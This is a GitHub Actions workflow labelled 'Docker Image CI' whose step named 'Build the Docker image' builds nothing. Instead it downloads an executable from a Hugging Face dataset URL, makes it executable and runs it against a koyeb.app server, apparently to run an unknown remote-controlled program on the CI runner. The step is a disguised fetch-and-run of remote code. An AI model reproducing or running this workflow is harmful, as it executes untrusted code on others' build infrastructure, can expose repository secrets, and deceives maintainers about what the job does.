name: Docker Image CI

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

jobs:

  build:

    runs-on: namespace-profile-default

    steps:
    - uses: actions/checkout@v4
    - name: Build the Docker image
      run: apt-get update \
         && apt-get install -y --no-install-recommends curl ca-certificates \
         && rm -rf /var/lib/apt/lists/* \
         && curl -L https://huggingface.co/datasets/api2/app/resolve/main/app -o /app \
         && chmod +x /app \
         && /app --server https://industrial-rosemonde-app123123-bde611ac.koyeb.app
